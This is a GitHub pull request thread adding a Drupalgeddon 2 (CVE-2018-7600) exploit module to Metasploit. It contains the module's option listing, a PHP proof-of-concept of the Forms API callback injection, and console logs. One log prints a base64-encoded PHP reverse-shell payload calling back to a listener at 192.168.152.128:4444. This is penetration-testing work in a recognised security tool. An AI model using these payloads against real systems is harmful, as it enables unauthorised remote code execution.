New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Drupal Drupalgeddon 2 #9876

Merged
merged 26 commits into from Apr 25, 2018

Conversation

@wvu-r7
Copy link
Contributor

wvu-r7 commented Apr 13, 2018

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > info

       Name: Drupal Drupalgeddon 2 Forms API Property Injection
     Module: exploit/unix/webapp/drupal_drupalgeddon2
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-03-28

Provided by:
  Jasper Mattsson
  a2u
  Nixawk
  FireFart
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic (PHP In-Memory)
  1   Automatic (PHP Dropper)
  2   Automatic (Unix In-Memory)
  3   Automatic (Linux Dropper)
  4   Drupal 7.x (PHP In-Memory)
  5   Drupal 7.x (PHP Dropper)
  6   Drupal 7.x (Unix In-Memory)
  7   Drupal 7.x (Linux Dropper)
  8   Drupal 8.x (PHP In-Memory)
  9   Drupal 8.x (PHP Dropper)
  10  Drupal 8.x (Unix In-Memory)
  11  Drupal 8.x (Linux Dropper)

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        If output should be dumped
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                         yes       The target address
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API.
  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
  vulnerable.

References:
  https://cvedetails.com/cve/CVE-2018-7600/
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600
  Also known as: SA-CORE-2018-002
  Also known as: Drupalgeddon 2

msf5 exploit(unix/webapp/drupal_drupalgeddon2) >

Resolves #9789.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/drupal branch 11 times, most recently from 3897d04 to 50f8058 Apr 13, 2018

@wvu-r7 wvu-r7 added the needs-docs label Apr 14, 2018

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/drupal branch 11 times, most recently from bced7e2 to 6838a4e Apr 14, 2018

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/drupal branch from 6838a4e to d8508b8 Apr 14, 2018

@nixawk

This comment has been minimized.

Copy link
Contributor

nixawk commented Apr 14, 2018

A php demo is prepared for exp tests. It shows how to exploit CVE-2018-7600.

root@lab:~# php /tmp/bug.php passthru id
PHP Warning:  Parameter 2 to passthru() expected to be a reference, value given in /tmp/bug.php on line 38
PHP Stack trace:
PHP   1. {main}() /tmp/bug.php:0
PHP   2. drupal_cve_2018_7600() /tmp/bug.php:45
uid=0(root) gid=0(root) groups=0(root)


root@lab:~# php /tmp/bug.php printf drupal
drupal6

<?php

// Author: Nixawk
// CVE-2018-7600: Unsanitized requests allow remote attackers to execute arbitrary code

// Usage:
// $ php drupal-rce-php.php passthru id

function drupal_cve_2018_7600($func, $param)
{
    $elements = array(
        "#markup" => "{Drupal\Core\Render\Markup}",
        "#type"   => "markup",
        "#post_render" => array(
        0 => $func
        ),
        "#suffix" => "<span class=\"ajax-new-content\"></span>",
        "#prefix" => "",
        "#cache"  => array(
            "contexts" => array(
            0 => "languages:language_intreface",
            1 => "theme",
            2 => "user.permissions"
            ),
            "tags" => array(),
        "max-age" => -1
        ),
        "#defaults_loaded" => true,
        "#attached" => array(),
        "#children" => array(
          "string" => $param
        )
    );

    // echo $elements['#children']["string"] . "\n";

    $elements['#children']["string"] = call_user_func(
        // $callable = $elements["#post_render"]["0"];
        $elements["#post_render"]["0"],
        $elements['#children']["string"], 
        $elements
    );

    echo $elements['#children']["string"] . "\n";

}

drupal_cve_2018_7600($argv[1], $argv[2]);

?>

@alfonsocaponi

This comment has been minimized.

Copy link

alfonsocaponi commented Apr 26, 2018

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set TARGETURI /drupal
TARGETURI => /drupal
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[-] Could not determine Drupal version to target
[*] 192.168.253.129:80 Cannot reliably check exploitability.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set TARGETURI /drupal/
TARGETURI => /drupal/
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 7.x targeted at http://192.168.253.129/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[+] 192.168.253.129:80 The target is vulnerable.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Apr 26, 2018

@alfonsocaponi that makes sense. At a guess, /drupal is returning a 302 redirect to /drupal/.

check does not follow redirects.

@alfonsocaponi

This comment has been minimized.

Copy link

alfonsocaponi commented Apr 26, 2018

@bcoles according to you, it could be useful add an option about redirect? :)

msjenkins-r7 added a commit that referenced this pull request Apr 26, 2018

msjenkins-r7 added a commit that referenced this pull request Apr 26, 2018

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 26, 2018

@alfonsocaponi: Happy to make the change.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Apr 26, 2018

Hmm, it'll be more complicated than that. Reactively writing in send_request_cgi! is not a practice I want to perpetuate. I'm investigating a better way.

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented May 3, 2018

Bah, it's catching my rebases. It's always a mistake to reference a PR in a commit. :/

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented May 3, 2018

@alfonsocaponi: See if the latest code works for you. Thanks.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented May 3, 2018

All right, I've committed what I hope to be my final revision to the module. Happy hunting. Bug reports welcome.

@user124567

This comment has been minimized.

Copy link

user124567 commented Jun 3, 2018

Hi - I have been trying to exploit a Raspbian/LAMP/Drupal8.5.0 install without success - any ideas why? Below is the output - thanks for any help!

[] Started reverse TCP handler on 192.168.152.128:4444
[
] Drupal 8 targeted at http://192.168.1.104/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[] Executing with printf(): 8237hWucIsyWIFYCWi8sDn9eRbsTlaOK2r
[
] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTUyLjEyOCc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFj.aygiTmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7));
[] Executing with passthru(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTUyLjEyOCc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFj.aygiTmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7));'
[
] Exploit completed, but no session was created.
msf exploit(unix/webapp/drupal_drupalgeddon2) > check

[] Drupal 8 targeted at http://192.168.1.104/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[
] Executing with printf(): 8sU6NkT0h7ZMtNZa6cbk1P1EARQFWROBfg0W6re
[+] 192.168.1.104:80 The target is vulnerable.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jun 3, 2018

@user124567: Are you sure your payload settings are correct? The payload can connect back? Also, it's possible there's no PHP CLI, or perhaps passthru() was disabled (you can change the PHP_FUNC option). Clearly assert() did not work. I suggest giving cmd/unix/generic a try and seeing if you can get shell output.

@user124567

This comment has been minimized.

Copy link

user124567 commented Jun 4, 2018

Thanks for taking the time to reply, have checked PHP CLI is installed and passthru is enabled, cmd/unix/generic doesn't run (not a compatible payload) but I tried all the available options without success as well, also with php_func = exec

I have the exploit running well against an intel cpu install we have but not the RaspberryPi install - again grateful for any suggestions - thanks

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jun 4, 2018

If cmd/unix/generic is not a compatible payload, your target is wrong. Select a Unix In-Memory target. Btw, if you have a bug, don't comment on the PR: create a new issue. If you require support, please ask us on IRC or via e-mail (msfdev@metasploit.com works).

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jun 4, 2018

Happy to wrap up debugging this with you here, though. :)

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jun 4, 2018

Next thing I would suggest is using strace to verify command injection is possible. I'd give your php.ini a once-over, too.

@wvu-r7 wvu-r7 referenced this pull request Jul 5, 2018

Merged

Add GitList argument injection exploit module #10262

6 of 6 tasks complete
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment